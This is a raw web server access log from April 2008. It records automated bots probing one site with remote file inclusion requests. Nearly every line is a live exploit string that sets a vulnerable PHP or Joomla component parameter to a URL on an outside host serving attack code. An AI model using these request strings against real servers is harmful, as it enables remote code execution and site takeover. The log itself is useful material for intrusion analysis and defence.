67.159.45.5 - - [29/Apr/2008:10:26:22 -0700] "GET /logs/access_080305.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.122.156.59 - - [29/Apr/2008:10:26:24 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
222.122.156.59 - - [29/Apr/2008:10:26:25 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
82.96.81.29 - - [29/Apr/2008:10:26:41 -0700] "GET /logs/access_080201.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.96.81.29 - - [29/Apr/2008:10:26:41 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.96.81.29 - - [29/Apr/2008:10:26:42 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.110.147.194 - - [29/Apr/2008:10:27:01 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://druidsutterance.net/templates/rt_technopia/css/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.255.3.207 - - [29/Apr/2008:10:27:03 -0700] "GET /logs/access_080201.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://163.21.14.134/appserv/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.110.147.194 - - [29/Apr/2008:10:27:05 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://druidsutterance.net/templates/rt_technopia/css/cmdaff? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
193.54.123.216 - - [29/Apr/2008:10:27:06 -0700] "GET /logs/access_071211.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.54.123.216 - - [29/Apr/2008:10:27:07 -0700] "GET /logs/access_071211.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.40 - - [29/Apr/2008:10:27:38 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.40 - - [29/Apr/2008:10:27:39 -0700] "GET /presto/?D=D HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:10:27:41 -0700] "GET /logs/access.log//?pg=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:10:27:47 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:10:27:47 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.245.149.155 - - [29/Apr/2008:10:28:06 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [29/Apr/2008:10:28:07 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.141.56.138 - - [29/Apr/2008:10:28:09 -0700] "GET /logs//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.138 - - [29/Apr/2008:10:28:10 -0700] "GET //includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.241.172.8 - - [29/Apr/2008:10:28:12 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/OLE.php=http://computasiunair.com/paddy/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.96.81.29 - - [29/Apr/2008:10:28:21 -0700] "GET /logs//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.96.81.29 - - [29/Apr/2008:10:28:21 -0700] "GET //includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [29/Apr/2008:10:28:33 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [29/Apr/2008:10:28:33 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [29/Apr/2008:10:28:41 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [29/Apr/2008:10:28:42 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:10:28:51 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:10:28:54 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:10:28:55 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.52.95 - - [29/Apr/2008:10:29:03 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback/ HTTP/1.0" 200 7172 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
89.111.176.28 - - [29/Apr/2008:10:29:08 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:29:38 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:29:40 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:29:48 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:29:53 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:29:53 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:29:53 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:29:54 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.56.138 - - [29/Apr/2008:10:30:03 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.17.1.143 - - [29/Apr/2008:10:30:08 -0700] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.studio-wave.com/tsu/styel.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:30:21 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:30:21 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:30:29 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:30:29 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:30:30 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:30:39 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.254.243.74 - - [29/Apr/2008:10:30:42 -0700] "GET /logs/cyberfolio/portfolio/msg/view.php?av=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.254.243.74 - - [29/Apr/2008:10:30:43 -0700] "GET /cyberfolio/portfolio/msg/view.php?av=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:10:30:45 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:10:30:45 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:10:30:45 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [29/Apr/2008:10:30:49 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [29/Apr/2008:10:30:50 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [29/Apr/2008:10:30:50 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:31:01 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:31:12 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:31:12 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:31:13 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:31:13 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:31:16 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:31:16 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:31:17 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:31:18 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:31:19 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.235.247.137 - - [29/Apr/2008:10:31:50 -0700] "GET /logs/access_080218.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.175.10 - - [29/Apr/2008:10:31:53 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.36.175.10 - - [29/Apr/2008:10:31:53 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.36.175.10 - - [29/Apr/2008:10:31:54 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.47.36.29 - - [29/Apr/2008:10:31:55 -0700] "GET /logs/access_080218.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.12.40 - - [29/Apr/2008:10:32:02 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:10:32:04 -0700] "GET /logs/access_080218.log/cyberfolio/portfolio/msg/view.php?av=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.175.10 - - [29/Apr/2008:10:32:05 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:10:32:16 -0700] "GET /logs/access_080124.log/cyberfolio/portfolio/msg/view.php?av=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.82.115.21 - - [29/Apr/2008:10:32:17 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.82.115.21 - - [29/Apr/2008:10:32:18 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.82.115.21 - - [29/Apr/2008:10:32:18 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.106.117 - - [29/Apr/2008:10:32:35 -0700] "GET /logs/access_080218.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.82.115.21 - - [29/Apr/2008:10:32:38 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:10:33:22 -0700] "GET /logs/access_080121.log/cyberfolio/portfolio/msg/view.php?av=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.113.203.55 - - [29/Apr/2008:10:33:41 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.113.203.55 - - [29/Apr/2008:10:33:41 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.113.203.55 - - [29/Apr/2008:10:33:41 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.93.123 - - [29/Apr/2008:10:33:45 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [29/Apr/2008:10:33:46 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
190.54.49.157 - - [29/Apr/2008:10:33:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
190.54.49.157 - - [29/Apr/2008:10:33:48 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:34:37 -0700] "GET /logs/access_080213.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:34:37 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:34:38 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:34:41 -0700] "GET /logs/access_080218.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.113.203.55 - - [29/Apr/2008:10:34:48 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.82.115.21 - - [29/Apr/2008:10:34:54 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
80.82.115.21 - - [29/Apr/2008:10:34:54 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
83.103.23.40 - - [29/Apr/2008:10:35:27 -0700] "GET /logs/access_071229.log/cyberfolio/portfolio/msg/view.php?av=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.67.51 - - [29/Apr/2008:10:35:27 -0700] "GET /logs/access_080218.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.159.45.5 - - [29/Apr/2008:10:36:15 -0700] "GET /logs/access_080218.log//faqsupport/samplefaqsupport.php?path[docroot]=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.236.111.227 - - [29/Apr/2008:10:36:35 -0700] "GET /logs/access_080201.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:10:36:43 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:10:36:43 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:10:36:44 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:36:56 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:36:56 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:36:56 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:36:57 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:10:37:00 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:10:37:01 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:10:37:01 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [29/Apr/2008:10:37:17 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [29/Apr/2008:10:37:17 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [29/Apr/2008:10:37:18 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:37:26 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:37:26 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
